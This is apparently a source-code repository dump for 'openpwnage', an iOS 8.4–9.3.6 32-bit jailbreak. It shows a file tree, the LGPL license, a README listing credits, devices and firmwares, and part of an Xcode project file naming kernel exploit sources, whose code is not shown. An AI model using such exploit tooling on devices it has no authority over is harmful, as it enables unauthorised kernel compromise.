├── LICENSE ├── README.md ├── openpwnage.xcodeproj ├── project.pbxproj ├── project.xcworkspace │ ├── contents.xcworkspacedata │ ├── xcshareddata │ │ ├── IDEWorkspaceChecks.plist │ │ └── WorkspaceSettings.xcsettings │ └── xcuserdata │ │ └── zachary7829.xcuserdatad │ │ ├── UserInterfaceState.xcuserstate │ │ └── WorkspaceSettings.xcsettings ├── xcshareddata │ └── xcschemes │ │ └── openpwnage.xcscheme └── xcuserdata │ └── zachary7829.xcuserdatad │ ├── xcdebugger │ └── Breakpoints_v2.xcbkptlist │ └── xcschemes │ └── xcschememanagement.plist ├── openpwnage ├── AppDelegate.h ├── AppDelegate.m ├── Assets.xcassets │ ├── AccentColor.colorset │ │ └── Contents.json │ ├── AppIcon.appiconset │ │ ├── Contents.json │ │ ├── openpwnagebeta7 (1)-1.png │ │ ├── openpwnagebeta7 (1).png │ │ ├── openpwnagebeta7 (10).png │ │ ├── openpwnagebeta7 (11).png │ │ ├── openpwnagebeta7 (2).png │ │ ├── openpwnagebeta7 (3)-1.png │ │ ├── openpwnagebeta7 (3).png │ │ ├── openpwnagebeta7 (4).png │ │ ├── openpwnagebeta7 (5).png │ │ ├── openpwnagebeta7 (6)-1.png │ │ ├── openpwnagebeta7 (6)-2.png │ │ ├── openpwnagebeta7 (6).png │ │ ├── openpwnagebeta7 (7).png │ │ ├── openpwnagebeta7 (8)-1.png │ │ ├── openpwnagebeta7 (8).png │ │ └── openpwnagebeta7 (9).png │ ├── Contents.json │ ├── openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton.imageset │ │ ├── Contents.json │ │ └── openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (3).png │ └── openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.imageset │ │ ├── Contents.json │ │ └── openpwnageB7JailbreakButtonopenpwnageB7JailbreakButton (4).png ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard ├── Info.plist ├── LGPL │ ├── LICENSE │ ├── kpmapAndCo.h │ ├── kpmapAndCo.m │ ├── patchfinder.h │ └── patchfinder.m ├── SettingsViewController.h ├── SettingsViewController.m ├── ViewController.h ├── ViewController.m ├── bootstrap.tar ├── jailbreak.h ├── jailbreak.m ├── launchctl ├── main.m ├── openpwnage │ ├── patchfinder8.c │ ├── patchfinder8.h 
│ ├── phoenix.m │ ├── trident.h │ └── trident.m └── tar └── releases └── openpwnage-build9-fix.ipa /LICENSE: -------------------------------------------------------------------------------- 1 | GNU LESSER GENERAL PUBLIC LICENSE 2 | Version 2.1, February 1999 3 | 4 | Copyright (C) 1991, 1999 Free Software Foundation, Inc. 5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 6 | Everyone is permitted to copy and distribute verbatim copies 7 | of this license document, but changing it is not allowed. 8 | 9 | [This is the first released version of the Lesser GPL. It also counts 10 | as the successor of the GNU Library Public License, version 2, hence 11 | the version number 2.1.] 12 | 13 | Preamble 14 | 15 | The licenses for most software are designed to take away your 16 | freedom to share and change it. By contrast, the GNU General Public 17 | Licenses are intended to guarantee your freedom to share and change 18 | free software--to make sure the software is free for all its users. 19 | 20 | This license, the Lesser General Public License, applies to some 21 | specially designated software packages--typically libraries--of the 22 | Free Software Foundation and other authors who decide to use it. You 23 | can use it too, but we suggest you first think carefully about whether 24 | this license or the ordinary General Public License is the better 25 | strategy to use in any particular case, based on the explanations below. 26 | 27 | When we speak of free software, we are referring to freedom of use, 28 | not price. Our General Public Licenses are designed to make sure that 29 | you have the freedom to distribute copies of free software (and charge 30 | for this service if you wish); that you receive source code or can get 31 | it if you want it; that you can change the software and use pieces of 32 | it in new free programs; and that you are informed that you can do 33 | these things. 
34 | 35 | To protect your rights, we need to make restrictions that forbid 36 | distributors to deny you these rights or to ask you to surrender these 37 | rights. These restrictions translate to certain responsibilities for 38 | you if you distribute copies of the library or if you modify it. 39 | 40 | For example, if you distribute copies of the library, whether gratis 41 | or for a fee, you must give the recipients all the rights that we gave 42 | you. You must make sure that they, too, receive or can get the source 43 | code. If you link other code with the library, you must provide 44 | complete object files to the recipients, so that they can relink them 45 | with the library after making changes to the library and recompiling 46 | it. And you must show them these terms so they know their rights. 47 | 48 | We protect your rights with a two-step method: (1) we copyright the 49 | library, and (2) we offer you this license, which gives you legal 50 | permission to copy, distribute and/or modify the library. 51 | 52 | To protect each distributor, we want to make it very clear that 53 | there is no warranty for the free library. Also, if the library is 54 | modified by someone else and passed on, the recipients should know 55 | that what they have is not the original version, so that the original 56 | author's reputation will not be affected by problems that might be 57 | introduced by others. 58 | 59 | Finally, software patents pose a constant threat to the existence of 60 | any free program. We wish to make sure that a company cannot 61 | effectively restrict the users of a free program by obtaining a 62 | restrictive license from a patent holder. Therefore, we insist that 63 | any patent license obtained for a version of the library must be 64 | consistent with the full freedom of use specified in this license. 65 | 66 | Most GNU software, including some libraries, is covered by the 67 | ordinary GNU General Public License. 
This license, the GNU Lesser 68 | General Public License, applies to certain designated libraries, and 69 | is quite different from the ordinary General Public License. We use 70 | this license for certain libraries in order to permit linking those 71 | libraries into non-free programs. 72 | 73 | When a program is linked with a library, whether statically or using 74 | a shared library, the combination of the two is legally speaking a 75 | combined work, a derivative of the original library. The ordinary 76 | General Public License therefore permits such linking only if the 77 | entire combination fits its criteria of freedom. The Lesser General 78 | Public License permits more lax criteria for linking other code with 79 | the library. 80 | 81 | We call this license the "Lesser" General Public License because it 82 | does Less to protect the user's freedom than the ordinary General 83 | Public License. It also provides other free software developers Less 84 | of an advantage over competing non-free programs. These disadvantages 85 | are the reason we use the ordinary General Public License for many 86 | libraries. However, the Lesser license provides advantages in certain 87 | special circumstances. 88 | 89 | For example, on rare occasions, there may be a special need to 90 | encourage the widest possible use of a certain library, so that it becomes 91 | a de-facto standard. To achieve this, non-free programs must be 92 | allowed to use the library. A more frequent case is that a free 93 | library does the same job as widely used non-free libraries. In this 94 | case, there is little to gain by limiting the free library to free 95 | software only, so we use the Lesser General Public License. 96 | 97 | In other cases, permission to use a particular library in non-free 98 | programs enables a greater number of people to use a large body of 99 | free software. 
For example, permission to use the GNU C Library in 100 | non-free programs enables many more people to use the whole GNU 101 | operating system, as well as its variant, the GNU/Linux operating 102 | system. 103 | 104 | Although the Lesser General Public License is Less protective of the 105 | users' freedom, it does ensure that the user of a program that is 106 | linked with the Library has the freedom and the wherewithal to run 107 | that program using a modified version of the Library. 108 | 109 | The precise terms and conditions for copying, distribution and 110 | modification follow. Pay close attention to the difference between a 111 | "work based on the library" and a "work that uses the library". The 112 | former contains code derived from the library, whereas the latter must 113 | be combined with the library in order to run. 114 | 115 | GNU LESSER GENERAL PUBLIC LICENSE 116 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 117 | 118 | 0. This License Agreement applies to any software library or other 119 | program which contains a notice placed by the copyright holder or 120 | other authorized party saying it may be distributed under the terms of 121 | this Lesser General Public License (also called "this License"). 122 | Each licensee is addressed as "you". 123 | 124 | A "library" means a collection of software functions and/or data 125 | prepared so as to be conveniently linked with application programs 126 | (which use some of those functions and data) to form executables. 127 | 128 | The "Library", below, refers to any such software library or work 129 | which has been distributed under these terms. A "work based on the 130 | Library" means either the Library or any derivative work under 131 | copyright law: that is to say, a work containing the Library or a 132 | portion of it, either verbatim or with modifications and/or translated 133 | straightforwardly into another language. 
(Hereinafter, translation is 134 | included without limitation in the term "modification".) 135 | 136 | "Source code" for a work means the preferred form of the work for 137 | making modifications to it. For a library, complete source code means 138 | all the source code for all modules it contains, plus any associated 139 | interface definition files, plus the scripts used to control compilation 140 | and installation of the library. 141 | 142 | Activities other than copying, distribution and modification are not 143 | covered by this License; they are outside its scope. The act of 144 | running a program using the Library is not restricted, and output from 145 | such a program is covered only if its contents constitute a work based 146 | on the Library (independent of the use of the Library in a tool for 147 | writing it). Whether that is true depends on what the Library does 148 | and what the program that uses the Library does. 149 | 150 | 1. You may copy and distribute verbatim copies of the Library's 151 | complete source code as you receive it, in any medium, provided that 152 | you conspicuously and appropriately publish on each copy an 153 | appropriate copyright notice and disclaimer of warranty; keep intact 154 | all the notices that refer to this License and to the absence of any 155 | warranty; and distribute a copy of this License along with the 156 | Library. 157 | 158 | You may charge a fee for the physical act of transferring a copy, 159 | and you may at your option offer warranty protection in exchange for a 160 | fee. 161 | 162 | 2. You may modify your copy or copies of the Library or any portion 163 | of it, thus forming a work based on the Library, and copy and 164 | distribute such modifications or work under the terms of Section 1 165 | above, provided that you also meet all of these conditions: 166 | 167 | a) The modified work must itself be a software library. 
168 | 169 | b) You must cause the files modified to carry prominent notices 170 | stating that you changed the files and the date of any change. 171 | 172 | c) You must cause the whole of the work to be licensed at no 173 | charge to all third parties under the terms of this License. 174 | 175 | d) If a facility in the modified Library refers to a function or a 176 | table of data to be supplied by an application program that uses 177 | the facility, other than as an argument passed when the facility 178 | is invoked, then you must make a good faith effort to ensure that, 179 | in the event an application does not supply such function or 180 | table, the facility still operates, and performs whatever part of 181 | its purpose remains meaningful. 182 | 183 | (For example, a function in a library to compute square roots has 184 | a purpose that is entirely well-defined independent of the 185 | application. Therefore, Subsection 2d requires that any 186 | application-supplied function or table used by this function must 187 | be optional: if the application does not supply it, the square 188 | root function must still compute square roots.) 189 | 190 | These requirements apply to the modified work as a whole. If 191 | identifiable sections of that work are not derived from the Library, 192 | and can be reasonably considered independent and separate works in 193 | themselves, then this License, and its terms, do not apply to those 194 | sections when you distribute them as separate works. But when you 195 | distribute the same sections as part of a whole which is a work based 196 | on the Library, the distribution of the whole must be on the terms of 197 | this License, whose permissions for other licensees extend to the 198 | entire whole, and thus to each and every part regardless of who wrote 199 | it. 
200 | 201 | Thus, it is not the intent of this section to claim rights or contest 202 | your rights to work written entirely by you; rather, the intent is to 203 | exercise the right to control the distribution of derivative or 204 | collective works based on the Library. 205 | 206 | In addition, mere aggregation of another work not based on the Library 207 | with the Library (or with a work based on the Library) on a volume of 208 | a storage or distribution medium does not bring the other work under 209 | the scope of this License. 210 | 211 | 3. You may opt to apply the terms of the ordinary GNU General Public 212 | License instead of this License to a given copy of the Library. To do 213 | this, you must alter all the notices that refer to this License, so 214 | that they refer to the ordinary GNU General Public License, version 2, 215 | instead of to this License. (If a newer version than version 2 of the 216 | ordinary GNU General Public License has appeared, then you can specify 217 | that version instead if you wish.) Do not make any other change in 218 | these notices. 219 | 220 | Once this change is made in a given copy, it is irreversible for 221 | that copy, so the ordinary GNU General Public License applies to all 222 | subsequent copies and derivative works made from that copy. 223 | 224 | This option is useful when you wish to copy part of the code of 225 | the Library into a program that is not a library. 226 | 227 | 4. You may copy and distribute the Library (or a portion or 228 | derivative of it, under Section 2) in object code or executable form 229 | under the terms of Sections 1 and 2 above provided that you accompany 230 | it with the complete corresponding machine-readable source code, which 231 | must be distributed under the terms of Sections 1 and 2 above on a 232 | medium customarily used for software interchange. 
233 | 234 | If distribution of object code is made by offering access to copy 235 | from a designated place, then offering equivalent access to copy the 236 | source code from the same place satisfies the requirement to 237 | distribute the source code, even though third parties are not 238 | compelled to copy the source along with the object code. 239 | 240 | 5. A program that contains no derivative of any portion of the 241 | Library, but is designed to work with the Library by being compiled or 242 | linked with it, is called a "work that uses the Library". Such a 243 | work, in isolation, is not a derivative work of the Library, and 244 | therefore falls outside the scope of this License. 245 | 246 | However, linking a "work that uses the Library" with the Library 247 | creates an executable that is a derivative of the Library (because it 248 | contains portions of the Library), rather than a "work that uses the 249 | library". The executable is therefore covered by this License. 250 | Section 6 states terms for distribution of such executables. 251 | 252 | When a "work that uses the Library" uses material from a header file 253 | that is part of the Library, the object code for the work may be a 254 | derivative work of the Library even though the source code is not. 255 | Whether this is true is especially significant if the work can be 256 | linked without the Library, or if the work is itself a library. The 257 | threshold for this to be true is not precisely defined by law. 258 | 259 | If such an object file uses only numerical parameters, data 260 | structure layouts and accessors, and small macros and small inline 261 | functions (ten lines or less in length), then the use of the object 262 | file is unrestricted, regardless of whether it is legally a derivative 263 | work. (Executables containing this object code plus portions of the 264 | Library will still fall under Section 6.) 
265 | 266 | Otherwise, if the work is a derivative of the Library, you may 267 | distribute the object code for the work under the terms of Section 6. 268 | Any executables containing that work also fall under Section 6, 269 | whether or not they are linked directly with the Library itself. 270 | 271 | 6. As an exception to the Sections above, you may also combine or 272 | link a "work that uses the Library" with the Library to produce a 273 | work containing portions of the Library, and distribute that work 274 | under terms of your choice, provided that the terms permit 275 | modification of the work for the customer's own use and reverse 276 | engineering for debugging such modifications. 277 | 278 | You must give prominent notice with each copy of the work that the 279 | Library is used in it and that the Library and its use are covered by 280 | this License. You must supply a copy of this License. If the work 281 | during execution displays copyright notices, you must include the 282 | copyright notice for the Library among them, as well as a reference 283 | directing the user to the copy of this License. Also, you must do one 284 | of these things: 285 | 286 | a) Accompany the work with the complete corresponding 287 | machine-readable source code for the Library including whatever 288 | changes were used in the work (which must be distributed under 289 | Sections 1 and 2 above); and, if the work is an executable linked 290 | with the Library, with the complete machine-readable "work that 291 | uses the Library", as object code and/or source code, so that the 292 | user can modify the Library and then relink to produce a modified 293 | executable containing the modified Library. (It is understood 294 | that the user who changes the contents of definitions files in the 295 | Library will not necessarily be able to recompile the application 296 | to use the modified definitions.) 
297 | 298 | b) Use a suitable shared library mechanism for linking with the 299 | Library. A suitable mechanism is one that (1) uses at run time a 300 | copy of the library already present on the user's computer system, 301 | rather than copying library functions into the executable, and (2) 302 | will operate properly with a modified version of the library, if 303 | the user installs one, as long as the modified version is 304 | interface-compatible with the version that the work was made with. 305 | 306 | c) Accompany the work with a written offer, valid for at 307 | least three years, to give the same user the materials 308 | specified in Subsection 6a, above, for a charge no more 309 | than the cost of performing this distribution. 310 | 311 | d) If distribution of the work is made by offering access to copy 312 | from a designated place, offer equivalent access to copy the above 313 | specified materials from the same place. 314 | 315 | e) Verify that the user has already received a copy of these 316 | materials or that you have already sent this user a copy. 317 | 318 | For an executable, the required form of the "work that uses the 319 | Library" must include any data and utility programs needed for 320 | reproducing the executable from it. However, as a special exception, 321 | the materials to be distributed need not include anything that is 322 | normally distributed (in either source or binary form) with the major 323 | components (compiler, kernel, and so on) of the operating system on 324 | which the executable runs, unless that component itself accompanies 325 | the executable. 326 | 327 | It may happen that this requirement contradicts the license 328 | restrictions of other proprietary libraries that do not normally 329 | accompany the operating system. Such a contradiction means you cannot 330 | use both them and the Library together in an executable that you 331 | distribute. 332 | 333 | 7. 
You may place library facilities that are a work based on the 334 | Library side-by-side in a single library together with other library 335 | facilities not covered by this License, and distribute such a combined 336 | library, provided that the separate distribution of the work based on 337 | the Library and of the other library facilities is otherwise 338 | permitted, and provided that you do these two things: 339 | 340 | a) Accompany the combined library with a copy of the same work 341 | based on the Library, uncombined with any other library 342 | facilities. This must be distributed under the terms of the 343 | Sections above. 344 | 345 | b) Give prominent notice with the combined library of the fact 346 | that part of it is a work based on the Library, and explaining 347 | where to find the accompanying uncombined form of the same work. 348 | 349 | 8. You may not copy, modify, sublicense, link with, or distribute 350 | the Library except as expressly provided under this License. Any 351 | attempt otherwise to copy, modify, sublicense, link with, or 352 | distribute the Library is void, and will automatically terminate your 353 | rights under this License. However, parties who have received copies, 354 | or rights, from you under this License will not have their licenses 355 | terminated so long as such parties remain in full compliance. 356 | 357 | 9. You are not required to accept this License, since you have not 358 | signed it. However, nothing else grants you permission to modify or 359 | distribute the Library or its derivative works. These actions are 360 | prohibited by law if you do not accept this License. Therefore, by 361 | modifying or distributing the Library (or any work based on the 362 | Library), you indicate your acceptance of this License to do so, and 363 | all its terms and conditions for copying, distributing or modifying 364 | the Library or works based on it. 365 | 366 | 10. 
Each time you redistribute the Library (or any work based on the 367 | Library), the recipient automatically receives a license from the 368 | original licensor to copy, distribute, link with or modify the Library 369 | subject to these terms and conditions. You may not impose any further 370 | restrictions on the recipients' exercise of the rights granted herein. 371 | You are not responsible for enforcing compliance by third parties with 372 | this License. 373 | 374 | 11. If, as a consequence of a court judgment or allegation of patent 375 | infringement or for any other reason (not limited to patent issues), 376 | conditions are imposed on you (whether by court order, agreement or 377 | otherwise) that contradict the conditions of this License, they do not 378 | excuse you from the conditions of this License. If you cannot 379 | distribute so as to satisfy simultaneously your obligations under this 380 | License and any other pertinent obligations, then as a consequence you 381 | may not distribute the Library at all. For example, if a patent 382 | license would not permit royalty-free redistribution of the Library by 383 | all those who receive copies directly or indirectly through you, then 384 | the only way you could satisfy both it and this License would be to 385 | refrain entirely from distribution of the Library. 386 | 387 | If any portion of this section is held invalid or unenforceable under any 388 | particular circumstance, the balance of the section is intended to apply, 389 | and the section as a whole is intended to apply in other circumstances. 390 | 391 | It is not the purpose of this section to induce you to infringe any 392 | patents or other property right claims or to contest validity of any 393 | such claims; this section has the sole purpose of protecting the 394 | integrity of the free software distribution system which is 395 | implemented by public license practices. 
Many people have made 396 | generous contributions to the wide range of software distributed 397 | through that system in reliance on consistent application of that 398 | system; it is up to the author/donor to decide if he or she is willing 399 | to distribute software through any other system and a licensee cannot 400 | impose that choice. 401 | 402 | This section is intended to make thoroughly clear what is believed to 403 | be a consequence of the rest of this License. 404 | 405 | 12. If the distribution and/or use of the Library is restricted in 406 | certain countries either by patents or by copyrighted interfaces, the 407 | original copyright holder who places the Library under this License may add 408 | an explicit geographical distribution limitation excluding those countries, 409 | so that distribution is permitted only in or among countries not thus 410 | excluded. In such case, this License incorporates the limitation as if 411 | written in the body of this License. 412 | 413 | 13. The Free Software Foundation may publish revised and/or new 414 | versions of the Lesser General Public License from time to time. 415 | Such new versions will be similar in spirit to the present version, 416 | but may differ in detail to address new problems or concerns. 417 | 418 | Each version is given a distinguishing version number. If the Library 419 | specifies a version number of this License which applies to it and 420 | "any later version", you have the option of following the terms and 421 | conditions either of that version or of any later version published by 422 | the Free Software Foundation. If the Library does not specify a 423 | license version number, you may choose any version ever published by 424 | the Free Software Foundation. 425 | 426 | 14. If you wish to incorporate parts of the Library into other free 427 | programs whose distribution conditions are incompatible with these, 428 | write to the author to ask for permission. 
For software which is 429 | copyrighted by the Free Software Foundation, write to the Free 430 | Software Foundation; we sometimes make exceptions for this. Our 431 | decision will be guided by the two goals of preserving the free status 432 | of all derivatives of our free software and of promoting the sharing 433 | and reuse of software generally. 434 | 435 | NO WARRANTY 436 | 437 | 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO 438 | WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 439 | EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR 440 | OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY 441 | KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE 442 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 443 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE 444 | LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME 445 | THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 446 | 447 | 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN 448 | WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY 449 | AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU 450 | FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR 451 | CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE 452 | LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING 453 | RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A 454 | FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF 455 | SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH 456 | DAMAGES. 
457 | 458 | END OF TERMS AND CONDITIONS 459 | 460 | How to Apply These Terms to Your New Libraries 461 | 462 | If you develop a new library, and you want it to be of the greatest 463 | possible use to the public, we recommend making it free software that 464 | everyone can redistribute and change. You can do so by permitting 465 | redistribution under these terms (or, alternatively, under the terms of the 466 | ordinary General Public License). 467 | 468 | To apply these terms, attach the following notices to the library. It is 469 | safest to attach them to the start of each source file to most effectively 470 | convey the exclusion of warranty; and each file should have at least the 471 | "copyright" line and a pointer to where the full notice is found. 472 | 473 | 474 | Copyright (C) 475 | 476 | This library is free software; you can redistribute it and/or 477 | modify it under the terms of the GNU Lesser General Public 478 | License as published by the Free Software Foundation; either 479 | version 2.1 of the License, or (at your option) any later version. 480 | 481 | This library is distributed in the hope that it will be useful, 482 | but WITHOUT ANY WARRANTY; without even the implied warranty of 483 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 484 | Lesser General Public License for more details. 485 | 486 | You should have received a copy of the GNU Lesser General Public 487 | License along with this library; if not, write to the Free Software 488 | Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 489 | USA 490 | 491 | Also add information on how to contact you by electronic and paper mail. 492 | 493 | You should also get your employer (if you work as a programmer) or your 494 | school, if any, to sign a "copyright disclaimer" for the library, if 495 | necessary. 
Here is a sample; alter the names: 496 | 497 | Yoyodyne, Inc., hereby disclaims all copyright interest in the 498 | library `Frob' (a library for tweaking knobs) written by James Random 499 | Hacker. 500 | 501 | , 1 April 1990 502 | Ty Coon, President of Vice 503 | 504 | That's all there is to it! 505 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Credits: 2 | 3 | - jailbreak made by 0xilis 4 | - (jk?) kpmap patch 5 | - spv/p0laris for patchfinder (based off of planetbeing pf) 6 | - dora2-ios for part of patchfinder (based off of planetbeing pf) 7 | 8 | # openpwnage 9 | Open source iOS 8.4b4-9.3.6 32bit Semi-Untethered jailbreak 10 | 11 | ## Notice 12 | 13 | iOS 9 patchfinder is by spv, iOS 8 patchfinder (not on this repo) by dora2-iOS. These patchfinders are based off of planetbeing's patchfinder. Please give thanks to them. 14 | 15 | This shit was a cobbled together and is mostly other people's work and done way worse, please don't use this. I'd honestly recommend using Phoenix instead, it's better coded. 
16 | 17 | 18 | ## Supported Devices: 19 | 20 | - iPhone 4S 21 | - iPhone 5 22 | - iPhone 5C 23 | - iPad 2 24 | - iPad 3 25 | - iPad 4 26 | - iPad Mini 27 | - iPod Touch 5 28 | 29 | ## Supported Firmwares: 30 | 31 | - iOS 9.3.6 32 | - iOS 9.3.5 33 | - iOS 9.3.4 34 | - iOS 9.3.3 35 | - iOS 9.3.3 Beta 5 36 | - iOS 9.3.3 Beta 4 37 | - iOS 9.3.3 Beta 3 38 | - iOS 9.3.3 Beta 2 39 | - iOS 9.3.3 Beta 1 40 | - iOS 9.3.2 41 | - iOS 9.3.2 Beta 4 42 | - iOS 9.3.2 Beta 3 43 | - iOS 9.3.2 Beta 2 44 | - iOS 9.3.2 Beta 1 45 | - iOS 9.3.1 46 | - iOS 9.3 47 | - iOS 9.3 Beta 7 48 | - iOS 9.3 Beta 6 49 | - iOS 9.3 Beta 5 50 | - iOS 9.3 Beta 4 51 | - iOS 9.3 Beta 3 52 | - iOS 9.3 Beta 2 53 | - iOS 9.3 Beta 1.1 54 | - iOS 9.3 Beta 1 55 | - iOS 9.2.1 56 | - iOS 9.2.1 Beta 2 57 | - iOS 9.2.1 Beta 1 58 | - iOS 9.2 59 | - iOS 9.2 Beta 4 60 | - iOS 9.2 Beta 3 61 | - iOS 9.2 Beta 2 62 | - iOS 9.2 Beta 1 63 | - iOS 9.1 64 | - iOS 9.1 Beta 5 65 | - iOS 9.1 Beta 4 66 | - iOS 9.1 Beta 3 67 | - iOS 9.1 Beta 2 68 | - iOS 9.1 Beta 1 69 | - iOS 9.0.2 70 | - iOS 9.0.1 71 | - iOS 9.0 72 | - iOS 9.0 GM 73 | - iOS 9.0 Beta 5 74 | - iOS 9.0 Beta 4 75 | - iOS 9.0 Beta 3 76 | - iOS 9.0 Beta 2 77 | - iOS 9.0 Beta 1 78 | - iOS 8.4.1 79 | - iOS 8.4.1 Beta 2 (Untested) 80 | - iOS 8.4.1 Beta 1 (Untested) 81 | - iOS 8.4 82 | - iOS 8.4 Beta 4 (Untested) 83 | 84 | # Special Note: 85 | 86 | - Please back up first before trying openpwnage. 87 | -------------------------------------------------------------------------------- /openpwnage.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 
2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 55; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | B005815C284B22E500B0A55F /* kernel_memory.c in Sources */ = {isa = PBXBuildFile; fileRef = B0058157284B22E500B0A55F /* kernel_memory.c */; }; 11 | B005815D284B22E500B0A55F /* sp_offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = B0058158284B22E500B0A55F /* sp_offsets.m */; }; 12 | B005815E284B22E500B0A55F /* iosurface.c in Sources */ = {isa = PBXBuildFile; fileRef = B0058159284B22E500B0A55F /* iosurface.c */; }; 13 | B005815F284B22E500B0A55F /* exploit_utilities.c in Sources */ = {isa = PBXBuildFile; fileRef = B005815A284B22E500B0A55F /* exploit_utilities.c */; }; 14 | B0058160284B22E500B0A55F /* exploit.c in Sources */ = {isa = PBXBuildFile; fileRef = B005815B284B22E500B0A55F /* exploit.c */; }; 15 | B00EE4E22851269700DA200C /* trident.m in Sources */ = {isa = PBXBuildFile; fileRef = B00EE4E12851269700DA200C /* trident.m */; }; 16 | B00EE4EB2851A55900DA200C /* patchfinder8.c in Sources */ = {isa = PBXBuildFile; fileRef = B00EE4EA2851A55900DA200C /* patchfinder8.c */; }; 17 | B03D34A5284BFB130052E025 /* tar in Resources */ = {isa = PBXBuildFile; fileRef = B03D34A4284BFB130052E025 /* tar */; }; 18 | B0463B882815AF4600F6C07E /* jailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = B0463B872815AF4500F6C07E /* jailbreak.m */; }; 19 | B05E8BB72810C16E00EA3CE0 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = B05E8BB62810C16E00EA3CE0 /* AppDelegate.m */; }; 20 | B05E8BBD2810C16E00EA3CE0 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = B05E8BBC2810C16E00EA3CE0 /* ViewController.m */; }; 21 | B05E8BC02810C16E00EA3CE0 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = B05E8BBE2810C16E00EA3CE0 /* Main.storyboard */; }; 22 | B05E8BC22810C17300EA3CE0 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = B05E8BC12810C17300EA3CE0 /* Assets.xcassets */; }; 23 | 
B05E8BC52810C17300EA3CE0 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = B05E8BC32810C17300EA3CE0 /* LaunchScreen.storyboard */; }; 24 | B05E8BC82810C17300EA3CE0 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = B05E8BC72810C17300EA3CE0 /* main.m */; }; 25 | B06829C5284C124F00C4B92C /* launchctl in Resources */ = {isa = PBXBuildFile; fileRef = B06829C4284C124F00C4B92C /* launchctl */; }; 26 | B086939C2812E7A400E9CAAD /* phoenix.m in Sources */ = {isa = PBXBuildFile; fileRef = B086939B2812E7A400E9CAAD /* phoenix.m */; }; 27 | B0A59D73288C632300943659 /* pf10.c in Sources */ = {isa = PBXBuildFile; fileRef = B0A59D72288C632300943659 /* pf10.c */; }; 28 | B0C29472281F01B100B00F98 /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = B0C29471281F01B100B00F98 /* IOKit.framework */; }; 29 | B0D2591528601C0C00BAFA4C /* bootstrap.tar in Resources */ = {isa = PBXBuildFile; fileRef = B0D2591428601C0C00BAFA4C /* bootstrap.tar */; }; 30 | B0F470DD2839223B0019CB57 /* patchfinder.c in Sources */ = {isa = PBXBuildFile; fileRef = B0F470DC2839223B0019CB57 /* patchfinder.c */; }; 31 | B0F470E228407C7E0019CB57 /* SettingsViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = B0F470E128407C7E0019CB57 /* SettingsViewController.m */; }; 32 | /* End PBXBuildFile section */ 33 | 34 | /* Begin PBXFileReference section */ 35 | B0058152284B22E500B0A55F /* kernel_memory.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = kernel_memory.h; sourceTree = ""; }; 36 | B0058153284B22E500B0A55F /* sp_offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = sp_offsets.h; sourceTree = ""; }; 37 | B0058154284B22E500B0A55F /* exploit.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = exploit.h; sourceTree = ""; }; 38 | B0058155284B22E500B0A55F /* exploit_utilities.h */ = {isa = PBXFileReference; fileEncoding = 4; 
